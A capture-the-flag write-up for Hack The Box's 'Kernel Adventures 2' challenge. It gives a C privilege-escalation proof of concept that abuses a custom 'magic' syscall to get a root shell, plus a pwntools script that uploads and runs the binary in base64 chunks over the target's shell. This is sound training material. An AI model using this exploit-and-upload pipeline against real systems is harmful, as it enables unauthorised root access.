HackTheBox Kernel Adventures 2 Challenge
Kernel Adventures 2 is a medium-difficulty Hack The Box challenge built around a custom Linux kernel: the author moved user management and authentication into the kernel as new syscalls, and solving it means reading the kernel diff, working out how the new "magic" syscall tracks users, and driving it from a small userland PoC to escalate to root. This write-up is about kernel-side logic bugs and syscall abuse, not about cryptography or generic file handling.
https://app.hackthebox.com/challenges/258
Description#
Apparently Linux authentication is done in userspace? That doesn’t sound safe, time to do it all in the kernel!
Exploitation#
Examining the kernel diff, we notice the addition of several new syscalls, including one named magic with syscall number 449. The PoC below drives it with three operations (0 = add user, 2 = delete user, 3 = switch to a user; operation 1 is not used) and relies on adding and deleting the same account MAX_USERS (65535) times before the final add-and-switch. That pattern only makes sense if repeated add/delete cycles advance some per-user counter or slot index in the kernel until the planted account lands on a privileged identity (e.g. uid 0) — the diff should be read to confirm exactly which field wraps or gets exhausted, since the write-up does not spell it out.
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <string.h>
/* Number of add/delete rounds performed before the PoC switches to the planted user. */
#define MAX_USERS 65535
/* Syscall number of the custom "magic" user-management syscall added by the challenge kernel. */
#define MAGIC_SYS 449
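/*
 * Add a user via the custom "magic" syscall (operation 0).
 *
 * username/password: NUL-terminated strings passed to the kernel as-is.
 * Returns the raw syscall(2) result (-1 with errno set when the kernel
 * rejects the call) so callers can check it — main() treats 0 as success.
 * The original wrapper discarded this value, which hid failures.
 */
long do_add(char* username, char* password) {
    return syscall(MAGIC_SYS, 0, username, password);
}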
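/*
 * Delete a user via the custom "magic" syscall (operation 2).
 * (Operation 1 is never used by this PoC and is not documented here.)
 *
 * username: NUL-terminated name of the account to remove.
 * Returns the raw syscall(2) result (-1 with errno set on failure) instead
 * of discarding it, so a caller can notice when a delete did not happen.
 */
long do_delete(char* username) {
    return syscall(MAGIC_SYS, 2, username);
}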
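/*
 * Switch the calling process to the given user via the custom "magic"
 * syscall (operation 3). In the PoC this is the step expected to hand the
 * process root before /bin/sh is exec'd.
 *
 * username/password: credentials of the account created with do_add().
 * Returns the raw syscall(2) result (-1 with errno set on failure) so the
 * caller can bail out instead of exec'ing a shell as the original user.
 */
long do_switch(char* username, char* password) {
    return syscall(MAGIC_SYS, 3, username, password);
}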
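/*
 * PoC entry point: churn the kernel's user table, switch to the planted
 * account and spawn a shell.
 *
 * Sequence (identical counts to the original): do_add() is called
 * MAX_USERS times in total and do_delete() MAX_USERS - 1 times, with the
 * switch happening right after the final add. Exactly which kernel counter
 * or slot this exhausts is defined in the challenge kernel diff, not here.
 *
 * Returns 1 if execve() fails; on success the process image is replaced
 * by /bin/sh and main() never returns.
 */
int main(void) {
    char *user = "pwn";
    char *pass = "12pwn34";

    /* MAX_USERS - 1 full add/delete rounds. */
    for (int i = 0; i < MAX_USERS - 1; i++) {
        do_add(user, pass);
        do_delete(user);
    }

    /* Final (MAX_USERS-th) add, then switch to that account. */
    do_add(user, pass);
    do_switch(user, pass);

    /* Empty environment on purpose: nothing from the caller leaks into the
     * spawned shell, same as the original. */
    char *args[] = {"/bin/sh", NULL};
    execve(args[0], args, NULL);

    /* execve() only returns on failure. The original fell through to a
     * second loop here that could never run (the first loop always
     * returned on its last iteration), so it has been dropped. */
    perror("execve");
    return 1;
}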
Build the PoC as a small static binary with musl. A static build removes any dependency on the target's libc and dynamic loader, and keeping it compact matters because the binary is pushed to the target over the interactive shell in base64-encoded chunks (see the upload script below).
# Static musl build: no dynamic loader or shared libc needed on the target,
# and -Os keeps the binary small for the chunked base64 upload below.
musl-gcc -static -march=x86-64 -Os poc.c -o expl
The following pwntools script connects to the challenge shell at `ip:port`, uploads the gzip-compressed, base64-encoded binary in 256-byte chunks via `echo ... >>`, decodes and decompresses it on the target, marks it executable, runs it, and then hands the connection over as an interactive session — which, if the switch succeeded, is a root shell. It synchronises on a `$` prompt, so it assumes an unauthenticated, unprivileged shell prompt on the target.
#!/usr/bin/python3
import base64
import gzip
import hashlib
import sys

from pwn import *
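def get_process():
    """Connect to the target given as ``ip:port`` in ``sys.argv[1]``.

    Returns a pwntools ``remote`` tube. Prints a usage message and exits
    with status 1 when the argument is missing or malformed (no ``:``
    separator, more than one ``:``, or a non-numeric port) rather than
    dying with a traceback. Only the argument parsing is inside the
    ``try`` so that errors raised by ``remote()`` itself are not mistaken
    for usage errors.
    """
    try:
        host, port = sys.argv[1].split(':')
        port = int(port)
    except (IndexError, ValueError):
        print(f'Usage: python {sys.argv[0]} <ip:port>')
        sys.exit(1)
    return remote(host, port)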
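# --- upload-and-run pipeline -------------------------------------------------
# The only channel to the target is its interactive shell, so the binary is
# gzip-compressed, base64-encoded and pushed through `echo` in fixed-size
# chunks. Base64 output contains no shell metacharacters and no `$`, so the
# chunks cannot be misparsed by the shell or mistaken for the prompt marker
# that this script synchronises on.
chunk_size = 256
file_name = 'expl'
file_name_encoded = file_name.encode()
remote_path = b'/home/user/' + file_name_encoded

with open(file_name, 'rb') as inf:
    exploit = inf.read()
# Printed so the operator can compare it against `sha256sum` on the target
# before running anything: a truncated or corrupted upload would otherwise
# only show up as a confusing exec failure.
print(f'Local SHA-256 of {file_name}: {hashlib.sha256(exploit).hexdigest()}')
data = base64.b64encode(gzip.compress(exploit))

conn = get_process()
n_chunks = (len(data) + chunk_size - 1) // chunk_size
for i in range(n_chunks):
    print(f'Uploading the exploit: {i + 1}/{n_chunks}')
    conn.recvuntil(b'$')
    # Truncate on the first chunk so a stale .base64 file left by an earlier,
    # aborted run cannot corrupt this upload; append for the rest.
    redirect = b' > ' if i == 0 else b' >> '
    chunk = data[i * chunk_size:(i + 1) * chunk_size]
    conn.sendline(b'echo ' + chunk + redirect + remote_path + b'.base64')
print(f'Uploading the exploit: {n_chunks}/{n_chunks}')

# Wait for the prompt after the last echo so each command below is sent
# only once the previous one has finished.
conn.recvuntil(b'$')
conn.sendline(b'base64 -d ' + remote_path + b'.base64 > ' + remote_path + b'.gz')
conn.recvuntil(b'$')
conn.sendline(b'gzip -d -c ' + remote_path + b'.gz > ' + remote_path)
conn.recvuntil(b'$')
conn.sendline(b'chmod +x ' + remote_path)
conn.recvuntil(b'$')
conn.sendline(remote_path)
conn.interactive()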
# Run inside the shell spawned by the PoC; only works if do_switch() actually gave us root.
cat /flag.txt
Summary#
The Kernel Adventures: Part 2 Challenge on Hack The Box dives into kernel exploitation with a focus on syscall manipulation. This medium-level challenge introduces a custom magic syscall, enabling privilege escalation through user management. By leveraging compact PoC binaries and an efficient upload-execute pipeline, the challenge offers a hands-on experience in advanced exploitation techniques, culminating in root access and system compromise. Perfect for refining skills in kernel-level hacking.